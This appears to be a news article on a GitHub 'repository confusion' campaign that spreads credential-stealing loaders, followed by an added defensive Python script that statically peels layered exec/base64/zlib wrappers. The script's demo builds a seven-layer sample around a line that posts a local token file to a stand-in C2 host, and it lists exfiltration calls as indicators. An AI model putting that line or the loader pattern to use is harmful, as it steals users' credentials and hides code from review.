Potentially millions of GitHub repositories infected in ‘repository confusion’ campaign



According to new reports, potentially millions of GitHub repositories have been infected with malware in a novel “repository confusion” attack.

According to cloud security firm Apiiro, more than 100,000 repositories have been compromised on GitHub, but the real number may be in the millions.

Threat actors are using what is known as a “repository confusion” attack, which takes advantage of the fact that a GitHub repository name only has to be unique per owner, not across the site, so a malicious copy can carry exactly the same name as the project it imitates.

First, attackers clone copies of popular GitHub repositories such as TwitterFollowBot, WhatsappBOT, discord-boost-tool, Twitch-Follow-Bot, and more.

Once cloned, attackers plant malware loaders in them, such as loaders that drop payloads designed to steal credentials, browser data, and other sensitive information.

The repositories are then re-uploaded to GitHub with the exact same names in the hope that developers who want to use the repositories will unknowingly download the infected ones.

To maximize success, hackers automatically fork infected repositories thousands of times and promote them on forums, Discord, and other places online.

While GitHub quickly removes many forked repositories, its automated security appears to miss many, particularly those that have been uploaded manually.

When an unsuspecting developer runs code from an infected repository, the loader begins unpacking a payload that has been hidden under seven layers of obfuscation.

In this process, malicious Python code and a specifically modified version of the BlackCap-Grabber malware are extracted and begin collecting sensitive information such as login details, passwords, personal data, and more.

This data is then transmitted to a command and control server managed by the threat actors.
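A check a practitioner would want before trusting a cloned repository, added here as an example that is not from the article, from Apiiro, or from the campaign itself: a script that statically peels nested exec() wrappers from a Python file using the ast module, without ever executing them, and reports how deep the wrapping goes and what the unwrapped core touches. It assumes each layer has the common loader shape exec(zlib.decompress(base64.b64decode('...'))), which the article does not specify; the seven-layer sample it builds and the indicator list are constructed for the demo.

```python
"""Static unwrapper for layered exec()/zlib/base64 loaders (added example).

Assumption: each obfuscation layer has the shape
    exec(zlib.decompress(base64.b64decode('<blob>')))
This is a common loader idiom, not a description of the actual campaign
payload. The sample input is constructed here and nothing is ever executed.
"""
import ast
import base64
import zlib

MAX_LAYERS = 32

# Heuristic indicators of collection/exfiltration in the unwrapped code (assumption).
INDICATORS = ("requests.post", "urllib.request", "socket.connect", "subprocess", "webhook")


def build_layered_sample(payload: str, layers: int) -> str:
    """Wrap `payload` in `layers` exec/zlib/base64 shells (constructed demo input)."""
    src = payload
    for _ in range(layers):
        blob = base64.b64encode(zlib.compress(src.encode())).decode()
        src = f"import base64, zlib\nexec(zlib.decompress(base64.b64decode('{blob}')))"
    return src


def _find_wrapped_blob(source: str):
    """Return the str/bytes literal fed into an exec()/eval() decode chain, or None."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return None
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval") and node.args):
            continue
        inner = node.args[0]
        # Walk down the call chain: zlib.decompress(base64.b64decode(<literal>)) ...
        while isinstance(inner, ast.Call):
            if inner.args:
                inner = inner.args[0]
            elif isinstance(inner.func, ast.Attribute):
                inner = inner.func.value      # e.g. <expr>.decode()
            else:
                break
        if isinstance(inner, ast.Constant) and isinstance(inner.value, (str, bytes)):
            return inner.value
    return None


def peel_layers(source: str, max_layers: int = MAX_LAYERS):
    """Statically unwrap nested layers; returns (layer_count, innermost_source)."""
    current = source
    layers = 0
    while layers < max_layers:
        blob = _find_wrapped_blob(current)
        if blob is None:
            break
        try:
            decoded = zlib.decompress(base64.b64decode(blob)).decode("utf-8", "replace")
        except (zlib.error, ValueError):
            break  # literal was not base64+zlib; stop rather than guess
        layers += 1
        current = decoded
    return layers, current


def scan_source(source: str) -> dict:
    """Triage one file: how deep the wrapping goes and what the core code touches."""
    layers, core = peel_layers(source)
    hits = sorted(i for i in INDICATORS if i in core)
    return {
        "layers": layers,
        "indicators": hits,
        "suspicious": layers >= 2 or bool(hits),
        "core_preview": core[:120],
    }


if __name__ == "__main__":
    # Constructed stealer-like core: reads a local token store and posts it out.
    stealer_like = ("import requests\n"
                    "requests.post('http://c2.invalid/upload', data=open('tokens.db', 'rb'))")
    print(scan_source(build_layered_sample(stealer_like, 7)))
    print(scan_source("print('hello')"))
```

Run it over every .py file in a freshly cloned repository before executing anything; a file that unwraps several layers deep, or whose core posts local files to a remote host, is worth treating as hostile regardless of the repository's name or star count. The unwrapper stops as soon as a literal is not base64+zlib, so a loader using a different encoding will show fewer layers than it really has and still needs manual review.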

The repository confusion campaign was first observed in May 2023, according to Apiiro, and has gained steam in recent months, with the number of infected repositories surpassing 100,000 in November 2023. While not confirmed, the real number could be in the millions.

Apiiro noted that malicious packages containing the payload in question first appeared in the Python Package Index (PyPI) in May 2023.

Just two months later, when PyPI began removing the malicious packages, threat actors switched to uploading infected repositories to GitHub manually.
